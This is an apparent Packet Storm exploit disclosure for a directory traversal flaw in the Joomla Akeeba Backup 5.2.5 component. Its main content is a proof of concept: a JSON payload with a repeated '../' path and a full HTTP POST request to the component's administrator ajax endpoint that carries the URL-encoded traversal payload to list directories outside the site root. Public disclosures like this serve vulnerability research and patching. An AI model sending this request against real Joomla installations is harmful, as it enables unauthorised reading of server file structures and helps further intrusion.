Joomla Akeeba Backup 5.2.5 Directory Traversal

2017-03-07T00:00:00
ID PACKETSTORM:141495
Type packetstorm
Reporter Mojtaba MobhaM
Modified 2017-03-07T00:00:00

Description

                                        
                                            `# Exploit Title: Joomla Component Akeeba Backup 5.2.5 - Directory Traversal  
# Date: 2017-03-07  
# Home : https://extensions.joomla.org/extensions/extension/access-a-security/site-security/akeeba-backup/  
# Version : Akeeba Backup Core 5.3.0.b1 (2017-02-22)   
# Exploit Author: Persian Hack Team  
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)  
# Home : http://persian-team.ir/  
# Telegram Channel AND Demo: @PersianHackTeam  
  
  
POC :  
1)Include and Exclude Information Section  
2)Click on Files and Directories Exclusion  
3)Subdirectories  
4)Post action Parameter Encode as Url : {"root":"[SITEROOT]","node":"../../../../../../../","verb":"list"}   
  
Request :   
  
POST /joomla/administrator/index.php?option=com_akeeba&view=FileFilters&task=ajax HTTP/1.1  
Host: 192.168.1.11  
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://192.168.1.11/joomla/administrator/index.php?option=com_akeeba&view=FileFilters  
Content-Length: 154  
Cookie: 8924dd79f450c03ec0748f316908b847=vod11einhb2gaelq1um1jsje66  
Connection: keep-alive  
Pragma: no-cache  
Cache-Control: no-cache  
  
action=%7b%22%72%6f%6f%74%22%3a%22%5b%53%49%54%45%52%4f%4f%54%5d%22%2c%22%6e%6f%64%65%22%3a%22%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%22%2c%22%76%65%72%62%22%3a%22%6c%69%73%74%22%7d&_cacheBustingJunk=0.04  
  
  
# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members  
# Iranian white hat Hackers  
`